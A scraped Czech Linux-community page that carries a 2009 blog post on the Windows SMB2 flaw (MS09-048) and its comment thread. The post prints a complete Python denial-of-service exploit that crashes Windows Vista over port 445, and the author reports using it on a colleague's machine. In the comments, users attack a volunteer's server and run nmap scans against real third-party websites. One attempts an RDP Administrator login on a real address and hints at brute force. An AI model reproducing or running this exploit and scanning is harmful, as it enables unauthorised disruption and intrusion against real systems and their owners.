Organizace Open Container Initiative (OCI) (Wikipedie), projekt nadace Linux Foundation, vydala Runtime Specification 1.3 (pdf), tj. novou verzi specifikace kontejnerového běhového prostředí. Hlavní novinkou je podpora FreeBSD.
Nový open source router Turris Omnia NG je v prodeji. Aktuálně na Allegro, Alternetivo, Discomp, i4wifi a WiFiShop.
Na YouTube a nově také na VHSky byly zveřejněny sestříhané videozáznamy přednášek z letošního OpenAltu.
Jednou za rok otevírá společnost SUSE dveře svých kanceláří široké veřejnosti. Letos je pro vás otevře 26. listopadu v 16 hodin v pražském Karlíně. Vítáni jsou všichni, kdo se chtějí dozvědět více o práci vývojářů, prostředí ve kterém pracují a o místní firemní kultuře. Můžete se těšit na krátké prezentace, které vám přiblíží, na čem inženýři v Praze pracují, jak spolupracují se zákazníky, partnery i studenty, proč mají rádi open source a co
… více »Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za říjen (YouTube).
Jeff Quast otestoval současné emulátory terminálu. Zaměřil se na podporu Unicode a výkon. Vítězným emulátorem terminálu je Ghostty.
Amazon bude poskytovat cloudové služby OpenAI. Cloudová divize Amazon Web Services (AWS) uzavřela s OpenAI víceletou smlouvu za 38 miliard USD (803,1 miliardy Kč), která poskytne majiteli chatovacího robota s umělou inteligencí (AI) ChatGPT přístup ke stovkám tisíc grafických procesů Nvidia. Ty bude moci využívat k trénování a provozování svých modelů AI. Firmy to oznámily v dnešní tiskové zprávě. Společnost OpenAI také nedávno
… více »Konference Prague PostgreSQL Developer Day 2026 (P2D2) se koná 27. a 28. ledna 2026. Konference je zaměřena na témata zajímavá pro uživatele a vývojáře. Příjem přednášek a workshopů je otevřen do 14. listopadu. Vítáme témata související s PostgreSQL či s databázemi obecně, a mohou být v češtině či angličtině.
Byl vydán Devuan 6 Excalibur. Přehled novinek v poznámkách k vydání. Kódové jméno Excalibur bylo vybráno podle planetky 9499 Excalibur. Devuan (Wikipedie) je fork Debianu bez systemd. Devuan 6 Excalibur vychází z Debianu 13 Trixie. Devuan 7 ponese kódové jméno Freia.
Společnost Valve aktualizovala přehled o hardwarovém a softwarovém vybavení uživatelů služby Steam. Podíl uživatelů Linuxu poprvé překročil 3 %, aktuálně 3,05 %. Nejčastěji používané linuxové distribuce jsou Arch Linux, Linux Mint a Ubuntu. Při výběru jenom Linuxu vede SteamOS Holo s 27,18 %. Procesor AMD používá 67,10 % hráčů na Linuxu.
Jak jistě všichni víte, nedávno M$ vydal záplaty jako každý jiný měsíc, ale co vlastně opravují? Údajně jsou všechny kritické a už by to mělo být oukej, ale ...
Seznam chyb je možno vidět třeba zde : Bezpečnostní aktualizace od Microsoftu: Září 2009.
O inkriminované chybě M$ píše přímo zde : Microsoft Security Bulletin MS09-048 - Critical
Tento způsob kritických chyb je snad nekonečná šňůra opravených oprav, které opravují předešlé opravy atd. Chtěl jsem si tedy vyzkoušet, jak mám tedy těmto opravám důvěřovat a co je potřeba k takovému průniku. Nakonec stačilo jen stáhnout tento malý skriptík v pythonu : Windows Vista/7 Remote SMB2.0 Denial of Service Exploit.
#!/usr/bin/python # SecurityReason Note : # Tested on : Windows Vista SP2 full updated - US-en # # When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D from socket import socket from time import sleep host = "192.168.3.224", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
Poté už jej jen stačilo spustit a podívat se, jak se Visty s SP2 a né zcela aktuální zachovají. Hned po spuštění šly do kolen, jako bychom vytáhli kabel ze zdi. Kolega mi tuto akci chtěl samozřejmě vrátit a tak se jal aktualizací a plně Visty zaktualizoval. Ještě projistotu ověřil, že zmiňovaná záplata je nainstalována a hned mi s úsměvem oznamoval, že už mám smolíka.
Nu, ale co, stejně to zkusím a uvidíme a hádejte co :D. Jojo, Visty šly opět do kolen :D. Takže si teď pokládám otázku, jak moc mám důvěřovat těmto záplatám :-/. Dalším řešením je samozřejmě třeba nastavení firewallu a blokace portu 445, ale toto mě nijak moc netěší :-/.
Jinak na serveru 2008 jsem to nezkoušel, přecijen tam běží databáze a další věci, je to ostrý provoz a testovací 2008 nemám. Nechtěl byste to někdo vyzkoušet? Zda to jede i u vás na zaktualizovaných Vistách a nebo Serveru 2008 (nejlépe i R2, sice tvrdí, že na R2 to nefachčí, ale kdo by jim po tomto věřil :-/ ) ?
Zdar Max
Tiskni
Sdílej:
10.9.2009 09:50
Max | skóre: 72
| blog: Max_Devaine
Kolega co u nás byl na brigádě si přinesl notebook s Windows 7, celkem si je pochvaloval, ale nevím nevím. Byl to člověk ze školy, kde je učí samé .NET apod., to moc vypovídací hodnotu mít nebude.
10.9.2009 09:56
Max | skóre: 72
| blog: Max_Devaine
10.9.2009 15:18
otasomil | skóre: 39
| blog: puppylinux
>>>Jinak Visty samozřejmě používá jen kterén
Cekal jsem co bude.
Kupodivu zadny flame = mate pravdu tentokrate vice nez je vubec mozne.
Nejaky remotak pre WXP SP3 by nebol, co? Lamy...
Aktualizace prý budou dostupné příčtí týden. (Což nic nemění na tom, že je to dobrá prdel 
)
10.9.2009 10:31
houska | skóre: 41
| blog: HW
10.9.2009 11:11
houska | skóre: 41
| blog: HW
11.9.2009 01:23
Luboš Doležel (Doli) | skóre: 98
| blog: Doliho blog
| Kladensko
11.9.2009 08:22
houska | skóre: 41
| blog: HW
11.9.2009 08:38
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
11.9.2009 09:34
houska | skóre: 41
| blog: HW
11.9.2009 10:08
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
Zcela správně. Naštěstí je firma MS partnerem, finální W7 Enterprise už tedy k dispozici máme :)
Vista nevydržela, finální W7 ano, zřejmě tedy půjde o bug ve vistoidním/2008 serverovém srv2.sys. Pokud už tedy windows k něčemu důležitému používáte, zkontrolujte si firewally :)
10.9.2009 12:42
Cohen | skóre: 21
| blog: Drobnosti
| Brno
A nezapomněl kolega restartovat. 
10.9.2009 12:58
Max | skóre: 72
| blog: Max_Devaine
10.9.2009 14:49
houska | skóre: 41
| blog: HW
10.9.2009 14:56
martin() | skóre: 6
| Prievidza / Bratislava
10.9.2009 14:59
Max | skóre: 72
| blog: Max_Devaine
10.9.2009 17:56
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
widle vesele jedou dal zavirovane a nepouzitelne. Kdyz neumis najit takovy exploit, tak to znamena ze neexistuje. Kazdej OS neni deravej. Linux sice mozna jeste nejake neosetrene chybky ma (vzdyt je to jen obycejny C program, tam se chybka udela snadno), ale to neznamena za kazdy OS musi byt napadnutelny.
10.9.2009 18:01
Jendа | skóre: 78
| blog: Jenda
| JO70FB
11.9.2009 09:04
belisarivs | skóre: 22
| blog: Psychobláboly
Presne.
Linuxove servery jsou radove lakavejsi cil nez domaci plecka Franty Vomacky.
10.9.2009 15:24
otasomil | skóre: 39
| blog: puppylinux
Sem s nim.
Pozvednite tu lidem naladu a polozte dalkove Linux na lopatky. Viz moje paticka.
Mj si dovoluji pripomenout ze mi bezi ftpd i sshd.
Pak se budem placat po zadech.
Neocekavam vsak zahlceni meho serveru gigabajtama dotazu - to umi kazda lama.
10.9.2009 15:40
Jendа | skóre: 78
| blog: Jenda
| JO70FB
~> telnet 86.61.236.66 Trying 86.61.236.66... Connected to 86.61.236.66. Escape character is '^]'. MikroTik v3.3 Login:
10.9.2009 16:02
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
10.9.2009 15:43
houska | skóre: 41
| blog: HW
10.9.2009 16:02
Jendа | skóre: 78
| blog: Jenda
| JO70FB
).
10.9.2009 16:48
otasomil | skóre: 39
| blog: puppylinux
Jeste nee a zatim se to ani nikomu nepodarilo.
O telnetu vim a nechavam to chladny - je to na zarizeni providera. Jestli to pouziva - nevim.
10.9.2009 18:43
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
Pozvednite tu lidem naladu a polozte dalkove Linux na lopatky.A MikroTik před ním se také počítá? Na tak starý znám exploitů hned několik.
10.9.2009 19:39
otasomil | skóre: 39
| blog: puppylinux
MikroTik se nepocita pac jej nemam ve sprave a tudiz o nem nic nevim.
Takze fakt nee.
moc se mi líbí ten nápad a jeste víc se mi líbí jak je to detailně popsaný a žádnej z těch lamer haxorů to ještě nedokázal
10.9.2009 19:40
otasomil | skóre: 39
| blog: puppylinux
A to je to co me s**e ze porad nic a nic.
10.9.2009 19:46
Jendа | skóre: 78
| blog: Jenda
| JO70FB
10.9.2009 21:07
otasomil | skóre: 39
| blog: puppylinux
Pozor zmena !
Mrknite znovu.
Staci shodit ten web server (jelikoz to jde v celku jednoduse)?
11.9.2009 15:41
Jendа | skóre: 78
| blog: Jenda
| JO70FB
11.9.2009 16:05
Jendа | skóre: 78
| blog: Jenda
| JO70FB
]
11.9.2009 16:15
Jendа | skóre: 78
| blog: Jenda
| JO70FB
11.9.2009 16:17
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Tak jsem to spustil. Nejede to tak rychle jak jsem si predstavoval, ale mel bys videt ze lighthttpd pouziva stale vice pameti (teda pokud opravdu mas vanila lighthttpd 1.4.19) a za chvili by mela dojit pamet.
Hm, tak to nema uz to nema cenu.
Jinak me se jednalo konkretne o tuhle chybu - http://redmine.lighttpd.net/issues/1774 , ktera je v 1.4.20 opravene (ja to zkousel u sebe na 1.4.19 a ta sla dolu po 5 minutach).
Ona vlastne je pravda ze Debian kriticke chyby opravuje dost rychle - pak clovek nevi jake ma heldat chyby - takze preji panu z Debianu at jim tohle vydrzi .
PS: skript na slozeni vanilla lighthttpd 1.4.19 prikladam.
11.9.2009 15:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
15:39:37 up 49 min, 1 user, load average: 0.11, 0.19, 0.26To ti někdo shodil, nebo to padlo samo? A kdo tam je zalogovaný? :-P
10.9.2009 15:16
otasomil | skóre: 39
| blog: puppylinux
Jo kdyby lide windows (jakekoli) pouzivali jen jako "substrat" na kterem pestuji zampiony (spousti svoje oblibene aplikace) tak nikoho nemuze jejich pad nijak rozhodit.
Nakazeny, plesnivy, smradlavy substrat vymenit pomoci dd ze zalohy a jede se vesele dale.
Aktualizace a opravy jak vidite stejne neresi ani problemy stare x let tak se na ne vykaslat, pravidelne obnovovat substrat a mate svaty pokoj.
Jednoduche, prakticke, 100% funkcni reseni a hlavne ZADARMO.
10.9.2009 16:49
otasomil | skóre: 39
| blog: puppylinux
Co ?
Ze si udelam bitovou zalohu systemoveho oddilu ?
10.9.2009 19:46
otasomil | skóre: 39
| blog: puppylinux
Asi na tom neco bude ze je to v rozporu s EULA.
Jinak verim ze by to delala spousta lidi a i admini ve firmach coz nevim ze by se delalo.
Problem je v tom ze obraz oddilu hdd ulozeny do souboru je v podstate kompletni system bit po bitu.
10.9.2009 20:35
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
11.9.2009 00:36
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
Myslis virtualizaciu?
10.9.2009 15:19
AsciiWolf | skóre: 41
| blog: Blog
Windows Server 2008 R2 (x64) - Po spusteni skriptu se nic nestalo. ocividne to uz zaplatovali...
10.9.2009 16:39
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
10.9.2009 16:59
belisarivs | skóre: 22
| blog: Psychobláboly
Ja ne. Stacilo nainstalovat palici program s ovladacem pro virtualni mechaniku a sly do kopru bleskem. A to definitivne. Reinstall to jistil.
10.9.2009 17:11
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
10.9.2009 17:33
otasomil | skóre: 39
| blog: puppylinux
>>>A to definitivne. Reinstall to jistil.
Proc, kdyz staci jen mit bitovou kopii, znovu ji nahrat a jede se dal.
11.9.2009 09:08
belisarivs | skóre: 22
| blog: Psychobláboly
A nenapadlo te, ze tva podminka nemusela byt splnena?
10.9.2009 18:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
10.9.2009 18:17
Limoto | skóre: 32
| blog: Limotův blog
Windows 7 RC down...
ts ts ts...
# ping www.strana-smer.sk
PING www.strana-smer.sk (93.184.70.229) 56(84) bytes of data.
64 bytes from www.strana (93.184.70.229): icmp_seq=1 ttl=123 time=27.0 ms
64 bytes from www.strana (93.184.70.229): icmp_seq=2 ttl=123 time=26.2 ms
64 bytes from www.strana (93.184.70.229): icmp_seq=3 ttl=123 time=25.9 ms
^C
--- www.strana-smer.sk ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 25.907/26.399/27.027/0.503 ms
# whois strana-smer.sk
%
% whois.sk-nic.sk - whois server for TLD .sk
%
Domain-name strana-smer.sk
Admin-id SMER-0001
Admin-name SMER - socialna demokracia
Admin-legal-form ina pravna forma
Admin-org.-ID 31801242
Admin-address Sumracna 25, Bratislava 82102
Admin-telephone 0907755584, 43426300, 0905 470 779
Admin-email suran@strana-smer.sk
Tech-id WEBG-0001
Tech-name WEBGLOBE, s.r.o.
Tech-org.-ID 36306444
Tech-address Stara Prievozska 2, Bratislava 82109
Tech-telephone 02 / 58101062, 02 / 58101060
Tech-email sk-nic@webglobe.sk
dns_name ns.webglobe.sk
dns_name ns2.webglobe.sk
dns_name ns3.webglobe.sk
Last-update 2009-09-10
Valid-date 2010-10-06
Domain-status DOM_OK
# nmap strana-smer.sk
Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-10 18:52 CEST
Interesting ports on www.strana (93.184.70.229):
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
3389/tcp open ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
# rdesktop -u Administrator 93.184.70.229
... no pekne...
10.9.2009 19:09
houska | skóre: 41
| blog: HW
rdesktop -u Administrator 93.184.70.229pekny ... vis co ted s tim? ;)
ak tak brute force alebo nejaky remotak - co ine? ale dalej uz pisat verejne nemozem
10.9.2009 19:38
Jendа | skóre: 78
| blog: Jenda
| JO70FB
no sak pisem ze sa nebudem verejne vyjadrovat...
ale ved to viem, tiez mi pride dost blbe ze to neide cez VPN...
zaujimavejsie je ale toto:
# nmap cssd.cz
Starting Nmap 5.00 ( http://nmap.org ) at 2009-09-10 19:23 CEST
Interesting ports on www.cssd.cz (80.188.162.141):
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.30 seconds
chvalim....
10.9.2009 19:21
Limoto | skóre: 32
| blog: Limotův blog
Dej si do googlu ASP hosting. Pak RDP na doménu a máš asi 50% šanci
10.9.2009 19:23
houska | skóre: 41
| blog: HW
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
nmap -p 445 nejaky.rozsah.v.iternetu/neco
Hmm, s těma záplatama to je děs. V poslední době snad nezáplatují nic jiného než (linuxově řečeno) SMB, a to je prasečina. Kdyby to aspoň opravili, ale jak je vidět, tak si s tím neví rady. Ono se holt nevyplácí tam cpát ty ***** z Windows 95 počínaje. Ale to se nabaluje, nabaluje a nakonec se v tom nikdo nevyzná.
10.9.2009 20:34
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
11.9.2009 10:48
houska | skóre: 41
| blog: HW
$ nmap -p 445 zive.cz Starting Nmap 4.68 ( http://nmap.org ) at 2009-09-11 10:48 CEST Interesting ports on www4.cpress.cz (77.93.192.144): PORT STATE SERVICE 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 0.076 seconds $
11.9.2009 15:47
Jendа | skóre: 78
| blog: Jenda
| JO70FB
15.11.2009 15:26
Max | skóre: 72
| blog: Max_Devaine
